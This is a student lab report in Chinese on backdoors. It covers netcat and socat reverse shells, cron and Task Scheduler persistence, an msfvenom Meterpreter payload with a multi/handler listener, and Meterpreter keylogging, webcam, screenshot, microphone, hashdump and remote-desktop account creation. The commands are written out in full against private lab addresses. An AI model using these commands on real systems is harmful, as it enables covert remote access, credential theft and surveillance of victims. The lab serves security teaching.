Exp2 后门原理与实践 20154320 李超

 目录
- 基础问题回答
- 基础知识
- 实验过程
- 实验心得体会

基础知识问答
 1. 例举你能想到的一个后门进入到你系统中的可能方式？
从不安全的网站上下载的程序可能存在后门。
 2. 例举你知道的后门如何启动起来(win及linux)的方式？

   操做系统可能自动启动，如实验中的cron服务和任务计划。也能够经过打开后门程序手动启动。
3. Meterpreter有哪些给你映像深入的功能？

   答：截屏，录像，以及键盘按键记录。若是不加以防范，本身的操做记录甚至操做时的图像和音频均可能被窃取，可能形成十分严重的后果。
4. 如何发现本身有系统有没有被安装后门？

   答 ：查看开机项中是否有本身不熟悉的或者可疑的项目。监控网络看是否有可疑的传输过程。
  
基础知识
 Netcat:

Netcat用于从TCP/UDP链接中读取或发送网络数据。cat是Linux中查看或链接文件的命令，因此netcat本意为从网络上查看文件内容。而Netcat的做者Hobbit为它添加了很是丰富的功能，使它几乎可以完成网络操做中各式各样的操做，因此Netcat在网络安全领域被称做“TCPIP的瑞士军刀”（"Swiss-army knife forTCP/IP"）。

cron:

cron是一个linux下的定时执行工具，能够在无需人工干预的状况下运行做业。因为Cron 是Linux的内置服务，但它不自动起来

 meterpreter:

Meterpreter是Metasploit的默认Windows系统下的Shell Code
之前Meterpreter只是Metasploit入侵时短时间凑活一下用的
一旦入侵成功后就尽快上传远控

可是如今新一代的Meterpreter变得异常强大
我甚至感受许多状况下用Meterpreter进行操做就足够了

特点功能1：快速提权
Getsystem命令快速提权
实在没有比这个简单的了
一条指令你就拥有了System权限

Meterpreter会本身尝试用多种方法让你得到System权限

特点功能2：Hashdump
运行这个命令：run post/windows/gather/hashdump
一条命令你就可以得到Windows的Sam 数据库里的内容
就是通过加密的用户名和密码

特点功能3：直接打开3389
Getgui命令是Meterpreter新添加的命令
这个命令可以让你轻松的在目标系统上打开3389远程管理
这条命令有两个用法：run getgui -e（仅仅是打开远程管理）
run getgui -u hacker -p s3cr3t（打开远程管理而且创造一个新的用户名为Hacker密码为s3cr3t的账号）

特点功能4：网络嗅探
Meterpreter拥有很是强大的网络嗅探能力
它可以不在目标系统上安装任何驱动的状况下进行网络嗅探
并且它还聪明到了本身的流量要被忽略掉

特点功能5：网络中继
每每入侵局域网黑客碰到的最大困难时没法穿过NAT
如今有了Meterpreter就轻松了
Meterpreter可以让一台你已经入侵的电脑变成中继，来入侵同一个局域网里的其余电脑

特点功能6：截屏
截屏看到对方电脑上正在作什么
这个功能很容易理解吧

实验过程

netcat获取主机操做Shell，cron启动

windows得到linux的shell
- windows平台下利用cmd的ipconfig命令查看到本机的ip地址为192.168.199.128

 

- windows下使用ncat.exe -l -p 4320命令运行ncat.exe监听4320端口。

 

 

- kali下使用为nc 192.168.199.128（即主机ip） 4320 -e /bin/sh命令链接windows的4320端口

 

- 链接成功后，咱们就能够在windows主机获取kali的信息，如输入ls命令：

 

linux得到windows的shell

- kali下使用nc -l -p 4320命令监听4320端口

- windows下使用ncat.exe -e cmd.exe 172.30.6.69 4328（即kali的IP地址）链接kali的4328端口。

 

 

- 链接成功后，咱们就能够在kali主机获取windows的信息，此时已成功获取windows的shell

能够输入指令打开win计算器

使用netcat传输数据
- windows下使用ncat.exe -l -p 4320命令运行ncat.exe监听4320端口。

 

- kali下使用为nc 192.168.199.128（即主机ip） 4320命令链接windows的4320端口

 

- 创建链接后，尝试传输

 

cron启动
- windows下使用ncat.exe -l -p 4320命令运行ncat.exe监听4320端口

用vi 修改cron文件

 

- kali下使用crontab -e命令，设置一条定时指令，设置成在12：45反向链接windows主机的4320端口

 

 

-12：45分时链接成功，成功得到linux的shell，输入ls指令查看。

 

 socat获取主机操做Shell, 任务计划启动

- windows下在控制面板->管理工具->任务计划程序中新建一个触发器

 

 

- kali下使用socat - tcp:192.168.199.128（即主机ip）:4320（端口），此时已成功获取windows的shell。

 

msf-meterpreter 生成后门，传输到靶机获取shell
- 在kali下输入命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=4320 -f exe > 20154320lc.exe 生成一个名为20154320lc的后门程序

 

- 使用netcat将这个后门程序传输到windows主机上。在windows下输入ncat.exe -lv 4320 > 20154320lc.exe

 

 

- 这里在关闭防火墙和杀毒软件 后运行。

使用msf获取目标摄像头，进行录屏、键盘记录等操做

- 首先msf打开监听进程
- msfconsole //进入msf

- use exploit/multi/handler //进入handler模式

- set payload windows/meterpreter/reverse_tcp //设置payload

- set LHOST 192.168.199.128 //将LHOST设置为LinuxIP地址

- set LPORT 4320 //设端口为那个4320

 

- exploit //MSF开始监听

查看获取键盘输入、截获摄像头、获取截图、录音

- 键盘记录

 

 

- 打开摄像头
 

 

- 截屏

 

- record_mic // 截获音频

 

实验感想- 此次实验很是有趣，同时也让我惊讶于计算机中漏洞、后门的危害性。作完实验后我第一时间从新打开了电脑的防火墙而且把摄像头用胶布封住。虽然此次实验的内容不过是学习后门知识的一点皮毛，但足以让我体会到网络安全相当重要，以及学好网络对抗技术这门课程在当今信息时代的重要性。